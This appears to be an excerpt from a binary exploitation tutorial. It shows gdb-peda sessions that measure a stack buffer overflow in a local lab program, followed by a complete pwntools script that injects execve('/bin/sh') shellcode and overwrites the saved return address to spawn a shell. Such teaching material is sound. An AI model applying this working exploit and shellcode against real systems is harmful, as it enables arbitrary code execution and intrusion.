...
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/shellcode/poc
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/shellcode/test
Breakpoint 1, 0x0000000000400566 in vuln ()
gdb-peda$ i r rsp
rsp 0x7fffffffe448 0x7fffffffe448
gdb-peda$ x/gx 0x7fffffffe448
0x7fffffffe448: 0x00000000004005ab
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x000000000040059d <+0>: push rbp
0x000000000040059e <+1>: mov rbp,rsp
0x00000000004005a1 <+4>: mov eax,0x0
0x00000000004005a6 <+9>: call 0x400566 <vuln>
0x00000000004005ab <+14>: nop
0x00000000004005ac <+15>: pop rbp
0x00000000004005ad <+16>: ret
End of assembler dump.
gdb-peda$
...
gdb-peda$ c
Continuing.
buf[50] address : 0x7fffffffe400
Breakpoint 2, 0x0000000000400595 in vuln ()
gdb-peda$ i r rsi
rsi 0x7fffffffe400 0x7fffffffe400
gdb-peda$ p/d 0x7fffffffe448 - 0x7fffffffe400
$1 = 72
gdb-peda$ ni
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKK
gdb-peda$ x/10gx 0x7fffffffe400
0x7fffffffe400: 0x4141414141414141 0x4242424242424242
0x7fffffffe410: 0x4343434343434343 0x4444444444444444
0x7fffffffe420: 0x4545454545454545 0x4646464646464646
0x7fffffffe430: 0x4747474747474747 0x4848484848484848
0x7fffffffe440: 0x4949494949494949 0x4a4a4a4a4a4a4a4a
gdb-peda$
...
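from pwn import *

# Distance from the start of buf[50] to the saved return address of vuln().
# Measured in gdb: rsp at the breakpoint (0x7fffffffe448) minus the leaked
# buffer address (0x7fffffffe400) = 72.
RET_OFFSET = 72

# 27-byte x86-64 execve("/bin/sh") shellcode:
#   xor eax,eax ; mov rbx,0xff978cd0919d96d1 ; neg rbx   -> rbx = "/bin/sh\0"
#   push rbx ; push rsp ; pop rdi                         -> rdi = "/bin/sh"
#   cdq ; push rdx ; push rdi ; push rsp ; pop rsi        -> rsi = argv, rdx = NULL
#   mov al,0x3b ; syscall                                 -> SYS_execve
# The "/bin/sh" string is stored negated so the shellcode contains no NUL bytes.
# It MUST be a bytes literal: on Python 3 a str literal cannot be concatenated
# with the bytes returned by p64(), and bytes >= 0x80 would not survive the
# str->bytes encoding on send.
SHELLCODE = (
    b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53"
    b"\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
)

p = process('./testpoc')

# The target leaks the address of buf[50] on stdout ("buf[50] address : 0x..."),
# which is what makes the return-to-stack reliable despite stack ASLR.
p.recvuntil(b'buf[50] address : ')
stackAddr = int(p.recvuntil(b'\n').strip(), 16)

# Payload layout in buf: [shellcode][NOP filler up to offset 72][saved RIP].
# The saved return address is overwritten with the leaked buffer address, so
# the `ret` at the end of vuln() lands on the first shellcode byte; the NOPs
# are only padding here, not a landing sled.
# NOTE(review): this technique requires an executable stack (NX disabled for
# the target); with NX on, the same overflow would need a ROP/ret2libc chain.
exploit = SHELLCODE
exploit += b"\x90" * (RET_OFFSET - len(SHELLCODE))
exploit += p64(stackAddr)

p.send(exploit)
p.interactive()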
...